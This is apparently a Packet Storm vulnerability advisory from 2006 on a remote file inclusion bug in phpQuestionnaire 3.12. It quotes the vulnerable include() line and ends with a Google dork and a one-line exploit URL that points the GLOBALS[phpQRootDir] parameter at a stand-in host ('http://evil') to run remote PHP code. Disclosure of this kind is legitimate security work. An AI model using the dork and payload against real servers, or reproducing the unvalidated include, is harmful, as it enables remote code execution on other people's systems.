phpQuestionnaire3.12.txt

2006-10-02T00:00:00
ID PACKETSTORM:50344
Type packetstorm
Reporter Solpot
Modified 2006-10-02T00:00:00

Description

                                        
                                            `#############################SolpotCrew Community################################  
#  
# phpQuestionnaire 3.12 (GLOBALS[phpQRootDir]) Remote File Inclusion   
#  
# vendor : http://http://www.chumpsoft.com/products/phpq/  
#  
#################################################################################  
#  
#  
# Bug Found By :Solpot a.k.a (k. Hasibuan) (21-09-2006)  
#  
# contact: chris_hasibuan@yahoo.com   
#   
# Website : http://www.nyubicrew.org/adv/solpot-adv-08.txt  
#  
################################################################################  
#  
#  
# Greetz: choi , h4ntu , Ibnusina , r4dja , No-profile , begu , madkid  
# robby , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa  
# home_edition2001 , Rendy , cow_1seng , ^^KaBRuTz , bYu , Lappet-homo  
# Blue|spy , cah|gemblung , Slacky , blind_boy , camagenta , XdikaX  
# x-ace , Dalmet , th3sn0wbr4in , iFX , ^YoGa^   
# and all member solpotcrew community   
# especially thx to str0ke @ milw0rm.com  
#  
###############################################################################  
Input passed to the "GLOBALS[phpQRootDir]" is not properly verified   
before being used to include files. This can be exploited to execute   
arbitrary PHP code by including files from local or external resources.   
  
code from inc/ifunctions.php  
  
################################################################################  
# phpQuestionnaire Version 3.12 #  
# Copyright 2003-2006 chumpsoft, inc. August 7, 2006 #  
# http://www.chumpsoft.com/products/phpq/ support@chumpsoft.com #  
################################################################################  
# Use of this program constitutes your agreement to the terms contained in the #  
# LICENSE file within this distribution. #  
################################################################################  
  
include($GLOBALS["phpQRootDir"] . "inc/tableformat.php");  
  
function ImportSurvey ($fp, $type, $flag) {  
set_time_limit(600); # Attempt to disable time limit in case upgrade takes long  
  
  
google dork : "phpQuestionnaire v3"  
  
exploit : http://somehost/path_to_phpQuestionnaire/inc/ifunctions.php?GLOBALS[phpQRootDir]=http://evil  
  
##############################MY LOVE JUST FOR U RIE#########################   
######################################E.O.F##################################   
`